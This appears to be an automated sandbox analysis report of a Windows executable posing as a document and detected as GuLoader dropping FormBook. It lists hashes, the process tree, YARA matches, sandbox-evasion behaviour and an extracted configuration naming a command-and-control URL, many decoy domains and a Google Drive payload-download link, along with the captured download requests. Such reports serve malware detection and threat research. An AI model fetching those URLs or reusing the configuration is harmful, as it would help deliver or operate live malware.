Play interactive tour

Edit tour

Windows Analysis Report Original Doc Ref SN02853801324189923.exe

Overview

General Information

Sample Name:	Original Doc Ref SN02853801324189923.exe
Analysis ID:	542742
MD5:	2b40b86c870ab6b0e9b08f26bd231e1a
SHA1:	78a6fc51761c25fe571fec37ca4beaa13d7b5d48
SHA256:	6c9c9bd77d704ca8c48a0125289e0e15e75f62f09d40ffad58a24bd96c3a57c0
Tags:	exeguloaderxloader
Infos:
Most interesting Screenshot:

Detection

GuLoader FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Yara detected Generic Dropper

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

GuLoader behavior detected

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Yara detected GuLoader

Hides threads from debuggers

Maps a DLL or memory area into another process

Tries to detect Any.run

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Machine Learning detection for sample

Tries to detect virtualization through RDTSC time measurements

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Yara signature match

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

PE file contains executable resources (Code or Archives)

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Enables debug privileges

Sample file is different than original file name gathered from version info

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

Original Doc Ref SN02853801324189923.exe (PID: 6352 cmdline: "C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe" MD5: 2B40B86C870AB6B0E9B08F26BD231E1A)

Semiha.exe (PID: 6404 cmdline: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Semiha.exe MD5: AE871D1957030344D4CEFC7295A1E964)

Semiha.exe (PID: 5580 cmdline: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Semiha.exe MD5: AE871D1957030344D4CEFC7295A1E964)

explorer.exe (PID: 3292 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

rundll32.exe (PID: 6612 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.thesocialmediacreator.com/i638/"], "decoy": ["serenitynailandspanj.com", "health-dodo.com", "agjordan.net", "retro-kids.com", "bobbygoldsports.com", "seitai-kuuto369.com", "sooga.club", "ezsweswrwy68.biz", "1006e.com", "libinyu.com", "prolinkdm.com", "pilysc.com", "blim.xyz", "eshop-dekorax.com", "timestretchmusic.com", "bs6351.com", "diamondmoodle.com", "antioxida.com", "sakugastudios.com", "metaverse-coaching.com", "motometics.com", "illumination-garage.com", "thelocalsproject.com", "erealestater.com", "frankenamazing.com", "arab-enterprises.com", "e15datadev.com", "bet365star.online", "bttextiles.com", "originaltradebot.icu", "test-testjisdnsec.net", "cloudwerx.digital", "gsjbd10.club", "joshuaearp.xyz", "tvaluehelp.com", "quietplaceintheforest.com", "refinanceforblue.com", "voiceoftour.com", "civicinfluence.com", "taxation-resources.com", "regeneration.land", "gogit.net", "spicynipples.com", "goldingravel.com", "selingoo.com", "aaryantech.com", "insight-j.com", "drivenbylight.net", "meipassion.com", "scuolapadelroma.store", "929671.com", "parkerdazzle.com", "yehudi-meshutaf.com", "johnsonforsheriff2022.com", "pointhunteracademy.com", "kyliiejenner.com", "tenlog066.xyz", "dobylife.com", "josemanueldelbusto.com", "vspfrme.com", "256571.com", "crossovertest.net", "fullcurlcnc.com", "theworldisheroyster.com"]}

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1vqWz"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000019.00000000.481436441.0000000000560000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000002.00000002.482011607.00000000029E0000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000019.00000002.782433249.000000001E460000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000019.00000002.782433249.000000001E460000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000019.00000002.782433249.000000001E460000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x16ac9:$sqlite3step: 68 34 1C 7B E1 0x16bdc:$sqlite3step: 68 34 1C 7B E1 0x16af8:$sqlite3text: 68 38 2A 90 C5 0x16c1d:$sqlite3text: 68 38 2A 90 C5 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000019.00000002.779078252.0000000000560000.00000040.00000001.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: Semiha.exe PID: 5580	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
Click to see the 2 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 00000002.00000002.482011607.00000000029E0000.00000040.00000001.sdmp	Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1vqWz"}
Source: 00000019.00000002.782433249.000000001E460000.00000040.00020000.sdmp	Malware Configuration Extractor: FormBook {"C2 list": ["www.thesocialmediacreator.com/i638/"], "decoy": ["serenitynailandspanj.com", "health-dodo.com", "agjordan.net", "retro-kids.com", "bobbygoldsports.com", "seitai-kuuto369.com", "sooga.club", "ezsweswrwy68.biz", "1006e.com", "libinyu.com", "prolinkdm.com", "pilysc.com", "blim.xyz", "eshop-dekorax.com", "timestretchmusic.com", "bs6351.com", "diamondmoodle.com", "antioxida.com", "sakugastudios.com", "metaverse-coaching.com", "motometics.com", "illumination-garage.com", "thelocalsproject.com", "erealestater.com", "frankenamazing.com", "arab-enterprises.com", "e15datadev.com", "bet365star.online", "bttextiles.com", "originaltradebot.icu", "test-testjisdnsec.net", "cloudwerx.digital", "gsjbd10.club", "joshuaearp.xyz", "tvaluehelp.com", "quietplaceintheforest.com", "refinanceforblue.com", "voiceoftour.com", "civicinfluence.com", "taxation-resources.com", "regeneration.land", "gogit.net", "spicynipples.com", "goldingravel.com", "selingoo.com", "aaryantech.com", "insight-j.com", "drivenbylight.net", "meipassion.com", "scuolapadelroma.store", "929671.com", "parkerdazzle.com", "yehudi-meshutaf.com", "johnsonforsheriff2022.com", "pointhunteracademy.com", "kyliiejenner.com", "tenlog066.xyz", "dobylife.com", "josemanueldelbusto.com", "vspfrme.com", "256571.com", "crossovertest.net", "fullcurlcnc.com", "theworldisheroyster.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: Original Doc Ref SN02853801324189923.exe

Virustotal: Detection: 29%

Perma Link

Yara detected FormBook

Show sources

Source: Yara match

File source: 00000019.00000002.782433249.000000001E460000.00000040.00020000.sdmp, type: MEMORY

Multi AV Scanner detection for domain / URL

Show sources

Source: www.thesocialmediacreator.com/i638/

Virustotal: Detection: 5%

Perma Link

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe

Virustotal: Detection: 32%

Perma Link

Machine Learning detection for sample

Show sources

Source: Original Doc Ref SN02853801324189923.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe

Code function: 0_2_00FC2DAE GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,

Source: Original Doc Ref SN02853801324189923.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: unknown	HTTPS traffic detected: 172.217.168.46:443 -> 192.168.2.7:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.1:443 -> 192.168.2.7:49831 version: TLS 1.2

Source: Original Doc Ref SN02853801324189923.exe

Static PE information: GUARD_CF, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wextract.pdb source: Original Doc Ref SN02853801324189923.exe
Source:	Binary string: wntdll.pdbUGP source: Semiha.exe, 00000019.00000002.782575822.000000001E7A0000.00000040.00000001.sdmp, Semiha.exe, 00000019.00000002.782754601.000000001E8BF000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Semiha.exe, Semiha.exe, 00000019.00000002.782575822.000000001E7A0000.00000040.00000001.sdmp, Semiha.exe, 00000019.00000002.782754601.000000001E8BF000.00000040.00000001.sdmp
Source:	Binary string: wextract.pdbPp source: Original Doc Ref SN02853801324189923.exe

Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe

Code function: 0_2_00FC21E7 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,

Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe	File opened: C:\Users\user~1\
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe	File opened: C:\Users\user~1\AppData\Local\Temp\
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe	File opened: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe	File opened: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Semiha.exe
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe	File opened: C:\Users\user~1\AppData\Local\
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe	File opened: C:\Users\user~1\AppData\

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: www.thesocialmediacreator.com/i638/
Source: Malware configuration extractor	URLs: https://drive.google.com/uc?export=download&id=1vqWz

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1vqWz_R4BQMLYr0EwMvVJ53NsyRGjMpKl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v1hb64q8i4krmmckqtjah3e0j55ac599/1640006700000/05208698352720309252/*/1vqWz_R4BQMLYr0EwMvVJ53NsyRGjMpKl?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-10-80-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443

Source: Semiha.exe, 00000019.00000003.741035770.000000000093F000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742494256.000000000093B000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.740971825.000000000093F000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779249493.0000000000940000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742345696.000000000093B000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742566992.000000000093E000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.740899622.0000000000942000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742408013.000000000093E000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742063444.000000000093B000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 0000001C.00000000.747255053.0000000006870000.00000004.00000001.sdmp, explorer.exe, 0000001C.00000002.767904819.0000000006870000.00000004.00000001.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: Semiha.exe, 00000019.00000003.741011877.0000000000981000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.740899622.0000000000942000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742044395.0000000000980000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
Source: Semiha.exe, 00000019.00000003.741011877.0000000000981000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.740899622.0000000000942000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742044395.0000000000980000.00000004.00000001.sdmp	String found in binary or memory: https://csp.withgoogle.com/csp/report-to/gse_l9ocaq
Source: Semiha.exe, 00000019.00000003.742063444.000000000093B000.00000004.00000001.sdmp	String found in binary or memory: https://doc-10-80-docs.googleusercontent.com/
Source: Semiha.exe, 00000019.00000003.742044395.0000000000980000.00000004.00000001.sdmp	String found in binary or memory: https://doc-10-80-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v1hb64q8
Source: Semiha.exe, 00000019.00000003.741035770.000000000093F000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742494256.000000000093B000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.740971825.000000000093F000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779249493.0000000000940000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742345696.000000000093B000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742566992.000000000093E000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742408013.000000000093E000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742063444.000000000093B000.00000004.00000001.sdmp	String found in binary or memory: https://doc-10-80-docs.googleusercontent.com/g
Source: Semiha.exe, 00000019.00000003.741035770.000000000093F000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742494256.000000000093B000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.740971825.000000000093F000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779249493.0000000000940000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742345696.000000000093B000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742566992.000000000093E000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742408013.000000000093E000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742063444.000000000093B000.00000004.00000001.sdmp	String found in binary or memory: https://doc-10-80-docs.googleusercontent.com/z
Source: Semiha.exe, 00000019.00000003.740959193.000000000093C000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1vqWz_R4BQMLYr0Ew
Source: Semiha.exe, 00000019.00000002.779387050.00000000021D0000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000003.742377343.0000000000916000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1vqWz_R4BQMLYr0EwMvVJ53NsyRGjMpKl
Source: Semiha.exe, 00000019.00000003.742532708.0000000000916000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779196860.0000000000917000.00000004.00000020.sdmp, Semiha.exe, 00000019.00000003.742377343.0000000000916000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1vqWz_R4BQMLYr0EwMvVJ53NsyRGjMpKlNE-%&
Source: Semiha.exe, 00000019.00000003.742532708.0000000000916000.00000004.00000001.sdmp, Semiha.exe, 00000019.00000002.779196860.0000000000917000.00000004.00000020.sdmp, Semiha.exe, 00000019.00000003.742377343.0000000000916000.00000004.00000001.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1vqWz_R4BQMLYr0EwMvVJ53NsyRGjMpKljD

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1vqWz_R4BQMLYr0EwMvVJ53NsyRGjMpKl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/v1hb64q8i4krmmckqtjah3e0j55ac599/1640006700000/05208698352720309252/*/1vqWz_R4BQMLYr0EwMvVJ53NsyRGjMpKl?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-10-80-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 172.217.168.46:443 -> 192.168.2.7:49830 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.168.1:443 -> 192.168.2.7:49831 version: TLS 1.2

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match

File source: 00000019.00000002.782433249.000000001E460000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000019.00000002.782433249.000000001E460000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000019.00000002.782433249.000000001E460000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: Original Doc Ref SN02853801324189923.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000019.00000002.782433249.000000001E460000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000019.00000002.782433249.000000001E460000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe

Code function: 0_2_00FC1DC7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,

Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe	Code function: 0_2_00FC5B88
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 2_2_029EE085
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 2_2_029EA432
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E7E6E30
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E7FEBB0
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E881002
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E7DB090
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E7C0D20
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E7E4120
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E7CF900
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E891D55
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_0056E085
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_0056A432

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 2_2_029EE085 NtResumeThread,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E8096E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E809660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E809780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E809FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E809860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E8099A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E809910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E809A80 NtOpenDirectoryObject,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E8096D0 NtCreateKey,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E809A00 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E809610 NtEnumerateValueKey,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E809A10 NtQuerySection,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E809A20 NtResumeThread,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E809650 NtQueryValueKey,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E809A50 NtCreateFile,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E809670 NtQueryInformationProcess,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E8097A0 NtUnmapViewOfSection,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E80A3B0 NtGetContextThread,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E809B00 NtSetValueKey,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E80A710 NtOpenProcessToken,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E809710 NtQueryInformationToken,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E809730 NtQueryVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E809760 NtOpenProcess,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E809770 NtSetInformationFile,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E80A770 NtOpenThread,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E8098A0 NtWriteVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E8098F0 NtReadVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E809820 NtEnumerateKey,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E809840 NtDelayExecution,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E80B040 NtSuspendThread,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E8099D0 NtCreateProcessEx,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E8095D0 NtClose,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E8095F0 NtQueryInformationFile,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E809520 NtWaitForSingleObject,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E80AD30 NtSetContextThread,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E809540 NtReadFile,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E809950 NtQueueApcThread,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_1E809560 NtWriteFile,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_00563133 NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Code function: 25_2_0056E7CC NtProtectVirtualMemory,

Source: Original Doc Ref SN02853801324189923.exe

Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, 66519 bytes, 1 file

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe

Process Stats: CPU usage > 98%

Source: Original Doc Ref SN02853801324189923.exe	Binary or memory string: OriginalFilename vs Original Doc Ref SN02853801324189923.exe
Source: Original Doc Ref SN02853801324189923.exe, 00000000.00000002.485465711.0000000000FCA000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs Original Doc Ref SN02853801324189923.exe
Source: Original Doc Ref SN02853801324189923.exe, 00000000.00000000.233147704.0000000000FCA000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs Original Doc Ref SN02853801324189923.exe
Source: Original Doc Ref SN02853801324189923.exe	Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs Original Doc Ref SN02853801324189923.exe

Source: Original Doc Ref SN02853801324189923.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Original Doc Ref SN02853801324189923.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Original Doc Ref SN02853801324189923.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Semiha.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: Original Doc Ref SN02853801324189923.exe

Virustotal: Detection: 29%

Source: Original Doc Ref SN02853801324189923.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Source: unknown	Process created: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe "C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe"
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Semiha.exe
Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Semiha.exe
Source: C:\Users\user\Desktop\Original Doc Ref SN02853801324189923.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\Semiha.exe C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\Semiha.exe
